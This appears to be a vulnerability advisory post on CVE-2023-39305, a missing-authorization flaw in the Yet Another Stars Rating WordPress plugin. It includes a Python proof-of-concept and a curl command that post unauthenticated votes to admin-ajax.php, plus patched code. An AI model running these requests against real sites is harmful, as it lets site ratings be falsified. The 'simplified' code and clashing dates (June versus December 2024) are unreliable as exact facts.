CVE CyberSecurity Database News

CVE-2023-39305 - How Missing Authorization in YetAnotherStarsRating.com Lets Attackers Exploit Your WordPress Stars Ratings

Poster -

CVE-2023-39305 is a security vulnerability discovered in the popular WordPress plugin Yet Another Stars Rating (YASR). This vulnerability exists in every version up to and including 3.4.3, and it allows attackers to exploit incorrectly configured access controls to perform actions they shouldn’t be able to. If your website uses YASR, it’s important to take action—read on for a full explanation, code examples, proof-of-concept exploit details, and references you can check yourself.

What Is Yet Another Stars Rating?

YASR is a WordPress plugin for adding star ratings to blog posts, pages, or products. People often use it to let users rate content or for displaying aggregate user scores.

What’s the Problem?

A lack of proper authorization checks (sometimes called “missing authorization”) in core YASR functions lets any user—including unauthenticated users—interact with actions that were meant only for admins or logged-in users. That means attackers can submit or manipulate ratings, which could be used to spam, deface, or otherwise damage your site’s credibility.

Affected versions:
All versions up to and including 3.4.3.

Where’s the Vulnerability?

The vulnerable code lives inside functions that process rating submissions via AJAX. For example, look at this simplified version of a handler in public/class-yasr-public-ajax.php:

public function yasr_ajax_insert_vote() {
    // MISSING AUTHORIZATION CHECK!
    $post_id = intval($_POST['post_id']);
    $rating = intval($_POST['rating']);

    // Process user vote, no capability check
    $this->insert_vote($post_id, $rating);

    wp_send_json_success(['message' => 'Vote inserted.']);
}

What’s missing?
There are no checks like current_user_can('edit_posts') or is_user_logged_in(). Anyone (even people who are not logged in) can POST data to the handler and their input will be saved.

Exploit Scenario

An attacker could write a script or simply use browser tools (like the Network tab in Developer Tools) to POST data to the vulnerable AJAX endpoint.

Sample Exploit Script (in Python)

import requests

url = 'https://targetsite.com/wp-admin/admin-ajax.php';
payload = {
    'action': 'yasr_ajax_insert_vote',
    'post_id': 123,  # target post ID
    'rating': 5      # star rating value (1-5)
}
# No authentication required!
req = requests.post(url, data=payload)
print(req.text)

If the target site is vulnerable, the star rating for post ID 123 will be set (or modified) even though the attacker isn’t logged in.

A very basic _curl_ command demonstrates exploitation

curl -X POST https://victimsite.com/wp-admin/admin-ajax.php \
  -d "action=yasr_ajax_insert_vote&post_id=42&rating=1"

This will insert a 1-star rating for post ID 42—no login needed.

Fix Timeline & Patch Status

As of the time of writing (June 2024), the vulnerability is fixed in YASR 3.4.4 and newer. The patch adds checks to ensure only authorized users and valid requests are processed.

Example patched code

public function yasr_ajax_insert_vote() {
    if (!is_user_logged_in()) {
        wp_send_json_error(['message' => 'Permission denied.']);
        return;
    }
    // ...rest of code...
}

Update YASR plugin right now to at least version 3.4.4.

- Block POST requests to /wp-admin/admin-ajax.php from untrusted sources IF you don’t use frontend AJAX.

References

- Official CVE Record: CVE-2023-39305
- YASR Plugin at WordPress.org
- Patch notes for YASR 3.4.4
- Responsible Disclosure Timeline (WPScan)

TL;DR

__CVE-2023-39305__ makes it scarily easy for anyone, even complete strangers, to mess with your star ratings if you run an outdated Yet Another Stars Rating plugin. Thankfully, the fix is easy—just update to the newest version. And if you’re ever in doubt, always check for available updates and review your plugins’ access controls often.

Timeline

Published on: 12/13/2024 15:15:20 UTC